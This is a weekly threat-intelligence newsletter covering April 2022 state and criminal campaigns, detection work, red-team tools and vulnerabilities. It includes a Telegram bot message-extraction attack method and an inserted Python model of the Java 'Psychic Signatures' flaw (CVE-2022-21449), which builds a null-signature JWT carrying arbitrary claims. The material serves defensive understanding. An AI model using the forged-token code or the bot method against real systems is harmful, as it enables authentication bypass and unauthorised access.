Bluepurple Pulse: week ending April 24th
The NSO business model has shown the possible value to investors
Welcome to the weekly highlights and analysis of the blueteamsec subreddit (and my wider reading).
Operationally this week there were two things. The first was the campaign involving stolen OAuth user tokens, issued to two third-party integrators, being used against GitHub. The second was that Java's implementation of the ECDSA signature algorithm was broken, allowing digital signatures to be spoofed in various situations - there will be a long tail of vulnerability as a result (see the vulnerabilities section).
In the high-level this week:
The US put up a $5 million reward for information on North Korea individuals for amongst other things their cyber activity.
🇺🇸🇦🇺🇨🇦🇳🇿🇬🇧 Put out a joint alert on Russian State-Sponsored and Criminal Cyber Threats to Critical Infrastructure - evolving intelligence indicates that the Russian government is exploring options for potential cyberattacks. I do stress exploring here.
The U.S. Ninth Circuit Court of Appeals rules that web scraping is legal and does not breach the US Computer Fraud and Abuse Act (other laws may still apply).
Cyber vigilantism in support of Ukraine: a legal analysis - an inconclusive and blurry analysis would be my summary of the conclusions.
US Cyber Command had their annual legal (and policy) conference, which is always interesting. There is a write-up from Lawfare, a recap and podcast from Duke University, and the videos of the sessions. It says a lot for the rules-based system that we (the West) operate under to have an annual conference on such a topic, as opposed to the apparent "just do it" attitude of our adversaries.
Not new, but a revelation to me, is that Israel has a think tank called The Institute for Analysis of New Security Challenges, whose purpose is to provide a common ground for discussion regarding both the risks and the opportunities arising in an era of rapidly expanding and developing technology.
Israeli charged in global hacker-for-hire scheme pleads guilty - charged in relation to New Delhi-based BellTroX InfoTech Services which was behind a hacking campaign that targeted lawyers, government officials, businessmen, investors and activists around the world.
Granularity in Cyber Policy Analysis - a video from Dave Aitel, whom I had the fortune to work with 20 years ago. He has a deep technical background and has now turned his attention to, amongst other things, some of the absurdity in cyber policy formation today.
The Cyber-Escalation Fallacy: What the War in Ukraine Reveals About State-Backed Hacking - the article poses a view around the absence of escalation across decades of strategic interaction in cyber, how that might limit the risk of conflict, and why cyber operations might instead primarily be a way to pursue strategic goals.
The New Yorker published its long piece on How Democracies Spy on Their Citizens - basically the rise of NSO-like capability from the private sector, enabling governments to do what they might not otherwise be able to.
UK Government Officials Infected with Pegasus - high-level indication of 🇬🇧 compromise attributed to the UAE, India, Cyprus and Jordan.
Okta concluded its investigation into the January 2022 compromise - a third party got rolled by teenagers and Okta dodged a bullet.
This week's reflection has been that the NSO business model has shown its potential to investors, even if it is semi-imploding in this instance due to irresponsible governance. That is, a business model where the private sector independently produces and maintains what would once have been dubbed "nation state capability" for cyber offence, without initial direction and control from a state, has been shown to be viable to the investor community. There were others before NSO and there have been others after, but the focus, quality, capability and scale of their overt go-to-market is arguably what has, in part, made them different. But also their value in foreign policy to their host country.
So it is not a massive logical leap to see that similarly capable firms will almost certainly emerge from other countries, backed by private investment. Then, as with NSO, you can see how these firms may be used as part of their host country's foreign policy to win favour overseas, once those countries realise what they have.
The interesting dimension for me is that these firms will also likely be subject to less influence from Western governments than NSO was when they inevitably get used against targets deemed unacceptable.
The Wassenaar Arrangement as a control, you say? There are, interestingly, a number of capable home countries which have not signed up to it.
Have a lovely Saturday
Cyber threat intelligence
Who is doing what to whom and how.
Aggregate reporting due to the ongoing conflict, although reporting seems to have slowed this week.
Cyberattack on state organizations of Ukraine using the topic "Azovstal" and the malicious program Cobalt Strike Beacon
Potential overlap between this threat actor and Trickbot due to cryptocurrency wallets.
Shuckworm: Espionage Group Continues Intense Campaign Against Ukraine
This Russian threat actor shows a degree of operational security through command and control server hygiene, as well as the use of multiple variants of their implants, likely in order to maintain persistence.
The Russian-linked Shuckworm espionage group (aka Gamaredon, Armageddon) is continuing to mount an intense cyber campaign against organizations in Ukraine.
Shuckworm has almost exclusively focused its operations on Ukraine since it first appeared in 2014. These attacks have continued unabated since the Russian invasion of the country. While the group’s tools and tactics are simple and sometimes crude, the frequency and persistence of its attacks mean that it remains one of the key cyber threats facing organizations in the region.
Ransomware Attacks on Agricultural Cooperatives Potentially Timed to Critical Seasons
Evidence of the potential anxiety in government due to the (escalating?) geopolitical situation. Concerns over targeting of food production, in the US at least, during the key season - it will be interesting to see if this was warranted.
The Federal Bureau of Investigation (FBI) is informing Food and Agriculture (FA) sector partners that ransomware actors may be more likely to attack agricultural cooperatives during critical planting and harvest seasons, disrupting operations, causing financial loss, and negatively impacting the food supply chain. The FBI noted ransomware attacks during these seasons against six grain cooperatives during the fall 2021 harvest and two attacks in early 2022 that could impact the planting season by disrupting the supply of seeds and fertilizer.
TraderTraitor: North Korean State-Sponsored APT Targets Blockchain Companies
No great revelation if you have been reading the reporting in this newsletter over the last little while. Just re-emphasis of the ongoing campaign we have been seeing.
The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the U.S. Treasury Department (Treasury) are issuing this joint Cybersecurity Advisory (CSA) to highlight the cyber threat associated with cryptocurrency thefts and tactics used by a North Korean state-sponsored advanced persistent threat (APT) group since at least 2020. This group is commonly tracked by the cybersecurity industry as Lazarus Group, APT38, BlueNoroff, and Stardust Chollima.
The ink-stained trail of GOLDBACKDOOR
Reporting on the same threat actor mentioned above targeting journalists covering North Korea.
On 18 March 2022, NK News shared multiple malicious artefacts from a spear-phishing campaign targeting journalists who specialize in the DPRK.
[We] assess with medium-high confidence that GOLDBACKDOOR is the successor of, or used in parallel with, the malware BLUELIGHT, attributed to APT37 / Ricochet Chollima. This assessment is based on technical overlaps between the two malware families and the impersonation of NK News, a South Korean news site focused on the DPRK.
The Gold Digger Hidden in the Investment Proposal
Further Chinese reporting on North Korean APT-C-26 (Lazarus) activity, which builds on the US warning above about the targeting of cryptocurrency assets. The lure is the most interesting aspect, as the tradecraft is pretty rudimentary.
Since last July we have captured multiple samples of a bait document titled Venture Labo Investment Pitch Deck (Protected).docx (Venture Labo Investment Proposal (Protected).docx); the main content of the document is an introduction to Venture Labo Investment Co., Ltd, a venture capital firm in Tokyo, Japan. The file is a document with remote template injection (CVE-2017-0199): when the user opens the document, the sample loads the remote template from the remote link, tricks the user into enabling macros, and then gets data from the remote address and injects it into a legitimate process to implement backdoor operations.
The attack is intended to steal cryptocurrency, which overlaps with the attack payload, process and IOCs of BlueNoroff, the Lazarus sub-group, and should be attributed to the BlueNoroff organization.
Nobelium - Israeli Embassy Maldoc
A few days ago, we discovered an interesting sample that we believe is part of the Nobelium campaign, also known as Dark Halo. It contains an attractive visual lure representing a document from the Israeli embassy.
Attack against multiple institutions in South Korea
Chinese technical reporting on an information-stealing operation in South Korea using a commodity capability. Someone is running a credential harvesting campaign for unknown reasons.
An attack targeting the Korea Scholarship Foundation, heavy industry companies and other institutions. Attackers use phishing emails with the subject "Requesting Basic Industry Quotations" to deliver malicious payloads disguised as quotations, in order to induce victims to decompress and execute the LokiBot stealer Trojan in the compressed package, resulting in disclosure of user privacy and information.
CIA "Hive" Malicious Code Attack Control Weapon Platform Analysis Report
China’s National Computer Virus Emergency Response Centre put out reporting, in Chinese, on what is allegedly CIA capability. It is unclear if they actually caught it in-country or just used information from the Vault7 leaks etc.
Recently, the National Computer Virus Emergency Response Centre analysed the "Hive" malicious code attack and control weapon platform (hereinafter referred to as the "Hive platform").
The National Computer Virus Emergency Response Centre has thoroughly analysed the technical details of the Hive platform samples, combined them with relevant information obtained from public channels, and basically completed the reproduction of typical attack scenarios on the Hive platform.
BlackCat/ALPHV Ransomware Indicators of Compromise
FBI reporting on the scale, and also the indicators, of this ransomware-as-a-service.
As of March 2022, BlackCat/ALPHV ransomware as a service (RaaS) had compromised at least 60 entities worldwide and is the first ransomware group to do so successfully using RUST, considered to be a more secure programming language that offers improved performance and reliable concurrent processing. BlackCat-affiliated threat actors typically request ransom payments of several million dollars in Bitcoin and Monero but have accepted ransom payments below the initial ransom demand amount. Many of the developers and money launderers for BlackCat/ALPHV are linked to Darkside/Blackmatter, indicating they have extensive networks and experience with ransomware operations.
TeamTNT targeting AWS, Alibaba
Darin Smith reports on a cryptomining operation targeting cloud platforms for compute access. It is an interesting strategy, as this type of operation (the theft of compute via cyber means) will likely incur less wrath from the authorities in the short term compared to more disruptive and impactful ransomware or hack-and-leak operations.
TeamTNT is actively modifying its scripts after they were made public by security researchers.
These scripts primarily target Amazon Web Services, but can also run on on-premises, container, or other forms of Linux instances.
The group's payloads include credential stealers, cryptocurrency miners, persistence and lateral movement.
TeamTNT scripts are also capable of disabling cloud security tools, such as Alibaba's aegis cloud security agent.
LemonDuck Targets Docker for Cryptomining Operations
Manoj Ahuje covers a different threat actor targeting the Docker containerisation platform for similar purposes.
LemonDuck, a well-known cryptomining botnet, is targeting Docker to mine cryptocurrency on Linux systems. This campaign is currently active.
It runs an anonymous mining operation by the use of proxy pools, which hide the wallet addresses.
It evades detection by targeting Alibaba Cloud’s monitoring service and disabling it.
CVE-2022-22965 Spring4Shell Vulnerability Exploited to Deploy Cryptocurrency Miners
Nitesh Surana and Ashish Verma document a campaign showing a threat actor attempting to exploit one of the Spring vulnerabilities. However, there is no confirmed successful in-the-wild exploitation.
We are unable to confirm if the exploitation attempts we analyzed for this blog entry were successful. It should be noted that we also observed Linux payloads where the script ldr.sh attempts to stop other running cryptocurrency miners in order to run its own payload.
Zloader 2: The Silent Night
Vladimir Martyanov reports on a successor to the Zeus banking trojan. Once all the rage, this style of operation has fallen off in recent times as banks improved their anti-fraud and anti-theft capabilities.
Zloader 2 (also known as Silent Night) is a multifunctional modular banking malware, aimed at providing unauthorized access to online banking systems, payment systems and other financial-related services. In addition to these functions it’s able to download and execute arbitrary files, steal files, inject arbitrary code to visited HTML pages and so on.
Conti Group Targets ESXi Hypervisors With its Linux Variant
Marc Elias, Jambul Tologonov and Alexandre Mundo report on an in-the-wild sample from this organised crime group targeting VMware environments. The low likelihood of the underlying VMware host having EDR is probably the reason they have focused their engineering efforts here.
On the 4th of April 2022, we detected an uploaded sample which triggered our threat-hunting rules. Upon further investigation, we determined the file is a Conti variant compiled for the Linux operating system targeting ESXi servers. Although the ESXi version of Conti is not new and has already been discussed, this is the first public sample we have seen in the wild.
Mars, a red-hot information stealer
Coverage of a commodity information stealer, likely used by initial access brokers as well as others looking to conduct low-level cyber crime.
Mars Stealer is an information stealer sold on underground forums by MarsTeam since June 22, 2021, under the malware-as-a-service model. The malware's capabilities are those of a classic stealer, with a focus on cryptocurrency theft. As a quick summary, Mars Stealer is able to:
collect data from several browsers (passwords, cookies, credit cards, etc.);
steal credentials from crypto plugins, crypto wallets and 2FA plugins;
fingerprint the infected host.
It shares code with other information stealers including Arkei, Oski and Vidar.
The Karakurt Web: Threat Intel and Blockchain Analysis Reveals Extension of Conti Business Model
Insights into the operations, scale and targeting of this criminal threat actor.
As opposed to typical ransomware in which the adversary will deny a victim access to data through encryption, Karakurt is a cybercrime group which infiltrates networks and engages in extortion by stealing and threatening to release data without any attempt to encrypt. Since its first observed attacks in August 2021, Karakurt has victimized organizations across a number of industries and in at least eight countries.
How we find and understand the latent compromises within our environments.
Microsoft Sentinel KQL Queries etc.
Numerous bits of Sentinel goodness this week:
A Powerful Conditional Access Change Dashboard for Microsoft Sentinel
Create a pivot table showing all conditional access policy outcomes over the last 30 days
Summarize outbound (users connecting to other tenants) activity by listing the users and which applications they are accessing in each remote tenant
When Defender for Cloud detects a possible DNS lookup to a phishing domain, attempt to find out if the URL was part of an email phishing attack
Extracting Cobalt Strike from Windows Error Reporting
Great bit of work by Blake showing how to extract Cobalt Strike when a process crash occurs, either accidentally or deliberately.
Windows Error Reporting is the native control for handling application crashes, leaving behind some handy logging and dumps that can help track an actor's presence. This entry will go through how we can extract Cobalt Strike from a Windows Error Reporting process dump. This can be a great method of detecting abnormal behaviour after a process has crashed.
Detecting HAFNIUM defense evasion technique
Arturo outlines how to detect the defence evasion technique used by this Chinese state actor, which we covered last week.
APTMalInsight: Identify and cognize APT malware based on system call information and ontology knowledge framework
Academic work on the topic of APT sample clustering, an approach which has been used by numerous researchers over the years. This work is from China and should be seen as an indicator of Chinese domestic focus on cyber defence more generally.
The evaluation results based on real APT malware samples demonstrate that the detection and clustering accuracy can reach up to 99.28% and 98.85% respectively. In addition, APTMalInsight supplies an effective cognition framework for APT malware and enhances the capability to understand APT attacks.
DecoyMini: 🐝 • Chinese binary-only honeypot system
The three things which fascinate me about China are:
Their propensity to release only binaries
Their love of statically linking everything into massive binaries
That this is the second mature binary-only honeypot system with a thriving community
They have also built an incentive scheme for sharing intelligence from the honeypot network.
Diversified simulation trapping capabilities: Loosely couples basic simulation capabilities and business simulation capabilities, uses simulation templates to manage industrialized and business-oriented simulation capabilities, and supports the rapid deployment of new simulation capabilities through one-click import and application of cloud simulation templates. The deployment efficiency of simulation capabilities has been improved several times over.
High scalability: A visual simulation orchestration engine is adopted to support the simulation of new network protocols, services and applications through interface configuration alone, which greatly reduces the development threshold for simulation capabilities. Templates support sharing via the DecoyMini forum.
Sharing rewards: Users can obtain rich rewards by manually or automatically sharing simulation templates and honeypot attack intelligence data through the tools.
How we proactively defend our environments.
Mitigating the top 10 security threats to GCP using the CIS Google Cloud Platform Foundation Benchmark
Viktor Gazdag from NCC Group shows how to materially improve the security of Google Cloud Platform environments.
This time we will take a closer look at what the CIS Google Cloud Platform Foundation Benchmark offers against 10 of the most common GCP misconfigurations that NCC Group comes across during client assessments. These were previously discussed in our blog post called Securing Google Cloud Platform – Ten best practices. In addition, at the end of the post we will see if the CIS Benchmark is indeed in line with the recommendations from real-life engagements. The top 10 best practices will be extended where possible with the benchmark recommendations, and anything missing will be called out. The best practices are often related to misconfigurations in a service, so the post will group them together around the related service where possible.
How to recover files encrypted by Yanlouwang
Marc Rivero shows that mathematics can win in cyber for the second time this week.
Yanluowang is a type of targeted ransomware discovered [whilst] investigating an incident on a large corporate network. [We] have found a vulnerability in the Yanluowang encryption algorithm and created a free decryptor to help victims of this ransomware with recovering their files.
.ISO Files With Office Maldocs & Protected View in Office 2019 and 2021
Didier Stevens explains why we have seen .iso files used to distribute Microsoft Office maldocs. The punchline is that this only changed in August 2021, to provide mark-of-web support.
One of the reasons to do this is to evade "mark-of-web propagation".
When a file (attached to an email, or downloaded from the Internet) is saved to disk on a Windows system, Microsoft applications will mark this file as coming from the Internet. This is done with a ZoneIdentifier Alternate Data Stream (like a “mark-of-web”).
When a Microsoft Office application, like Word, opens a document with a ZoneIdentifier ADS, the document is opened in Protected View (e.g., sandboxed).
But when an Office document is stored inside an ISO file, and that ISO has a ZoneIdentifier ADS, then Word will not open the document in Protected View.
VSTO Office Files Detection Notes
Great summary of technical indicators, building on last week's reporting on making phishing great again using VSTO files.
A tool for enumerating Telegram bot secret messages, although the ability to use this legally, in the UK at least, is unclear at best due to the need for an API key and the fact that it is described as an "attack".
Thanks to the implementation of the 'copyMessage' feature, we can conduct an attack with the following methodology, given access to the bot API key:
Retrieve the bot 'first_name' and 'username' Telegram fields using the 'getMe' request.
Search for the bot username on Telegram. (Manual Step)
Send a simple message to the bot in the private chat on Telegram. (Manual Step)
Retrieve our user account's 'id', which will be utilized as 'chat_id' for the private conversation, utilizing the 'getUpdates' request.
Finally, we tell the bot to copy whatever quantity of messages from their malware/phishing campaign, using 'from_chat_id', to our private 'chat_id' using the 'copyMessage' request.
Attack capability, techniques and tradecraft.
Adventures with KernelCallbackTable Injection
Meelo shows how the KernelCallbackTable can be abused to inject shellcode into a remote process. This method of process injection was used by FinFisher/FinSpy and Lazarus.
Implementing Global Injection and Hooking in Windows
Michael Maltsev has commoditised injection and hooking on Windows in a highly accessible and stable manner.
I’m pretty satisfied with the result. I’ve been using my computer with Windhawk, which uses this global injection and hooking implementation, for several months, and I didn’t experience any stability, performance, or any other problems. I hope that Windhawk will prove itself as a reliable tool for customizing Windows programs, and I invite you to try it out.
A Chinese post-compromise Cobalt Strike plugin which automates various tasks. We should probably plan to detect its use.
A blueprint for evading industry leading endpoint protection in 2022
Vincent Van Mieghem shows that a one-person war machine is still capable of upending firms with hundreds of millions of dollars in investment / revenue.
In this post, I’d like to lay out a collection of techniques that together can be used to bypass industry leading enterprise endpoint protection solutions.
Chris Au creates the one tool for Windows scheduled tasks to rule them all. Iranian use in 3..2
Scheduled tasks are one of the most popular attack techniques of the past decade and are still commonly used by hackers/red teamers for persistence and lateral movement.
A number of C# tools were already developed to simulate the attack using scheduled task. I have been playing around with some of them but each of them has its own limitations on customizing the scheduled task. Therefore, this project aims to provide a C# tool (CobaltStrike execute-assembly friendly) to include the features that I need and provide enough flexibility on customizing the scheduled task.
Sudheer Varma provides a proof of concept that combines different defence evasion techniques to build better red team payloads: embed an encrypted shellcode stub into a known signed executable and still manage to keep it signed, as the Zloader malware did on Windows.
Christian Mehlmauer released a tool to test and exploit STUN, TURN and TURN-over-TCP servers. This will frustrate various network border controls, flow analysis and packet inspection strategies, I suspect.
If you find a misconfigured server you can use this tool to open a local socks proxy that relays all traffic via the TURN protocol into the internal network behind the server.
Our attack surface.
CVE-2022-21449: Psychic Signatures in Java
The headline of this research from Neil Madden is that signed JWTs, SAML assertions or OIDC ID tokens, and even WebAuthn authentication messages, can be modified when the verifier is running a vulnerable Java version:
We then had a sample vulnerable application for the JWT null signature vulnerability (CVE-2022-21449) released; not a real app, but a good demonstrator.
Then Khaled Nassar released a proof of concept demonstrating its use with a vulnerable client and a malicious TLS server - the malicious server presents a valid (as of 2022-04-20) certificate chain for www.google.com.
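To make the defect concrete, here is an added pure-Python model of the bug (it is not Java's code, nor code from Madden's post or the demonstrator app): textbook P-256 ECDSA with a verifier that models the reported failure mode (no range check on r and s, an inverse that maps 0 to 0, and a point at infinity whose x coordinate reads as 0) next to a correct verifier, plus a constructed ES256 JWT carrying a 64-zero-byte signature. The private key, nonce and claims are constructed values.

```python
"""Model of CVE-2022-21449 ("Psychic Signatures"): an ECDSA verifier that skips the
1 <= r, s <= n-1 check accepts the all-zero signature for ANY message and ANY key.
Constructed illustration in pure Python; not Java's implementation."""
import base64
import hashlib
import json

# NIST P-256 domain parameters (public constants): y^2 = x^3 - 3x + B over GF(P), order N
P = 0xFFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF
N = 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551
B = 0x5AC635D8AA3A93E7B3EBBD55769886BC651D06B0CC53B0F63BCE3C3E27D2604B
G = (0x6B17D1F2E12C4247F8BCE6E563A440F277037D812DEB33A0F4A13945D898C296,
     0x4FE342E2FE1A7F9B8EE7EB4A7C0F9E162BCE33576B315ECECBB6406837BF51F5)
INF = None  # point at infinity


def point_add(p1, p2):
    """Affine group law on P-256 (a = -3)."""
    if p1 is INF:
        return p2
    if p2 is INF:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return INF
    if p1 == p2:
        lam = (3 * x1 * x1 - 3) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def scalar_mult(k, point):
    """Double-and-add; k == 0 yields the point at infinity."""
    result = INF
    while k:
        if k & 1:
            result = point_add(result, point)
        point = point_add(point, point)
        k >>= 1
    return result


def hash_to_int(message: bytes) -> int:
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % N


def sign(d: int, message: bytes, k: int):
    """Textbook ECDSA; k is a caller-supplied nonce (constructed here for the demo)."""
    r = scalar_mult(k, G)[0] % N
    s = pow(k, -1, N) * (hash_to_int(message) + r * d) % N
    return r, s


def verify_vulnerable(Q, message: bytes, sig):
    """Models the reported Java behaviour: no range check, a Fermat-style inverse that
    returns 0 for s == 0, and a projective infinity whose affine x converts to 0."""
    r, s = sig
    w = pow(s, N - 2, N)  # s^(n-2) mod n: equals s^-1 for s != 0, but 0 for s == 0
    u1, u2 = hash_to_int(message) * w % N, r * w % N
    R = point_add(scalar_mult(u1, G), scalar_mult(u2, Q))
    x = 0 if R is INF else R[0]  # infinity (Z = 0) is read back as x = 0
    return x % N == r  # with r = s = 0 this is 0 == 0 for every message


def verify_fixed(Q, message: bytes, sig):
    """Correct ECDSA: reject r or s outside [1, n-1] before doing any arithmetic."""
    r, s = sig
    if not (1 <= r < N and 1 <= s < N):
        return False
    w = pow(s, -1, N)
    u1, u2 = hash_to_int(message) * w % N, r * w % N
    R = point_add(scalar_mult(u1, G), scalar_mult(u2, Q))
    return R is not INF and R[0] % N == r


def es256_jwt_parts(token: str):
    """Split a compact JWT; decode its raw r||s ES256 signature into integers."""
    header, payload, sig_b64 = token.split(".")
    sig = base64.urlsafe_b64decode(sig_b64 + "=" * (-len(sig_b64) % 4))
    signing_input = f"{header}.{payload}".encode()
    return signing_input, (int.from_bytes(sig[:32], "big"), int.from_bytes(sig[32:], "big"))


def null_signature_jwt(claims: dict) -> str:
    """Constructed 'null signature' token: arbitrary claims, signature = 64 zero bytes."""
    b64 = lambda b: base64.urlsafe_b64encode(b).rstrip(b"=").decode()
    header = b64(json.dumps({"alg": "ES256", "typ": "JWT"}).encode())
    return f"{header}.{b64(json.dumps(claims).encode())}.{b64(bytes(64))}"
```

Running verify_vulnerable against the token from null_signature_jwt returns True for any public key, while verify_fixed returns False; a genuine signature from sign passes both.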
CVE-2022-0540 - Jira Security Advisory 2022-04-20 - Authentication bypass in Seraph
Jira and Jira Service Management are vulnerable to an authentication bypass in its web authentication framework, Jira Seraph.
Jira Core Server
Jira Software Server
Jira Software Data Center
Jira Service Management
Jira Service Management Server
Jira Service Management Data Center
When “secure” isn’t secure at all: High‑impact UEFI vulnerabilities discovered in Lenovo consumer laptops
Martin Smolár outlines vulnerabilities similar to those we have seen exploited in the past by Russia to maintain persistence.
The first two of these vulnerabilities – CVE-2021-3971, CVE-2021-3972 – affect UEFI firmware drivers originally meant to be used only during the manufacturing process of Lenovo consumer notebooks. Unfortunately, they were mistakenly included in the production BIOS images as well, without being properly deactivated. These affected firmware drivers can be activated by an attacker to directly disable SPI flash protections (BIOS Control Register bits and Protected Range registers) or the UEFI Secure Boot feature from a privileged user-mode process during OS runtime. This means that exploitation of these vulnerabilities would allow attackers to deploy and successfully execute SPI flash or ESP implants, like LoJax or our latest UEFI malware discovery ESPecter, on the affected devices.
What is being exploited.
VMSA-2022-0011 - Server Side Template Injection in VMware Workspace ONE Access and Identity Manager leading to RCE
VMware has confirmed that exploitation of CVE-2022-22954 has occurred in the wild
Lockbit 2.0 affiliate’s new SonicWall exploit bypasses MFA
Affiliates were observed exploiting a known but relatively obscure SQLi vulnerability (CVE-2019-7481 or CVE-2021-20028) in a novel manner to retrieve user session data stored in the SonicWall SSL VPN appliance.
Beanstalk Farms Post-Mortem Analysis
The DeFi craziness continues
On the 17th of April 2022, the Beanstalk Protocol experienced a flash-loan attack due to a flaw in its newly introduced Curve LP Silos that compromised the protocol’s governance mechanism, ultimately permitting the attacker to conduct an emergency execution of a malicious proposal siphoning project funds.
Some other small bits and bobs which might be of interest.
The More You Know, The More You Know You Don’t Know - Google Project Zero: A Year in Review of 0-days Used In-the-Wild in 2021 - more caught than in prior years
M-TRENDS 2022 Insights into Today’s Top Cyber Security Trends and Attacks
Monthly Threat Actor Group Intelligence Report, February 2022 (KOR) – Korean
Intelligence Handbook 4th Edition - A Roadmap for Building an Intelligence-Led Security Program
Which browsers are best for privacy? - Open-source tests of web browser privacy
Att&cking The Engenuity Evals (Mitre by Mitre) - a damning analysis of the recent MITRE endpoint evaluations
CISA Expands the Joint Cyber Defense Collaborative to include Industrial Control Systems Industry Expertise
Finally, you get some ANSI art, by a wonderful artist, which seemed topical to our industry this week:
That’s all folks.. until next week..